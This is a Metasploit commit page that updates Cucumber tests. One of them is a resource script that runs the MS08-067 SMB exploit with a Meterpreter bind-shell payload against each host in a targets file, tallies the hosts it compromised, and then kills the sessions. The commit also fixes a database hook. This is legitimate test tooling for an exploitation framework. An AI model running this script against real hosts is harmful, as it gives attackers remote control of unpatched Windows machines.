Skip to content

Commit 3a254a9

Browse files
committed
This is a combination of 5 commits.
@db tests not working because the part where we tell it to connect to the database was commented out. There was a race condition causing the rc script to exit before all of the sessions were opened. This change properly waits for us to get the expected number of sessions before exiting. Use a more reliable form of the rc script. Didn't mean to commit the schema.rb Forgot new line
1 parent ee40c9d commit 3a254a9

File tree

2 files changed

+39
-13
lines changed

2 files changed

+39
-13
lines changed

features/modules/exploit/smb/ms08_067_netapi.feature

Lines changed: 33 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -10,18 +10,39 @@ Feature: MS08-067 netapi
1010
Given I ready the windows targets
1111
Given a file named "ms08-067-bind.rc" with:
1212
"""
13-
<ruby>
14-
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
15-
self.run_single('use exploit/windows/smb/ms08_067_netapi')
16-
self.run_single('set payload windows/meterpreter/bind_tcp')
17-
hosts.each do |host|
18-
self.run_single("set RHOST #{host['ipAddress']}")
19-
self.run_single('run -j')
20-
sleep 1
21-
end
22-
self.run_single('sessions -K')
23-
</ruby>
13+
<ruby>
14+
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
15+
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
16+
payload_name = 'windows/meterpreter/bind_tcp'
17+
exploited_hosts = []
18+
failed_hosts = []
19+
20+
hosts.each do |host|
21+
print_status("Trying MS08-067 against #{host['ipAddress']}")
22+
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
23+
mod.datastore['PAYLOAD'] = payload_name
24+
mod.datastore['RHOST'] = host['ipAddress']
25+
m = mod.exploit_simple(
26+
'LocalInput' => nil,
27+
'LocalOutput' => nil,
28+
'Payload' => payload_name,
29+
'RunAsJob' => false
30+
)
31+
32+
sleep(1)
33+
34+
if m
35+
exploited_hosts << host['ipAddress']
36+
else
37+
failed_hosts << host['ipAddress']
38+
end
39+
end
40+
41+
print_status("Exploited hosts: #{exploited_hosts.inspect}")
42+
print_status("Failed hosts: #{failed_hosts.inspect}")
43+
self.run_single('sessions -K')
44+
</ruby>
2445
"""
25-
When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
46+
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
2647
Then the 'Mdm::Host' table contains the expected targets
2748

features/support/hooks.rb

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,14 @@
11
Before do
2-
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
2+
set_env('MSF_DATABASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
33
set_env('RAILS_ENV', 'test')
44
@aruba_timeout_seconds = 8.minutes
55
end
66

7+
Before('@db') do |scenario|
8+
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
9+
ActiveRecord::Base.establish_connection(dbconfig["test"])
10+
end
11+
712
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
813
# unless Bundler.settings.without.include?(:coverage)
914
# Before do |scenario|

0 commit comments

Comments
 (0)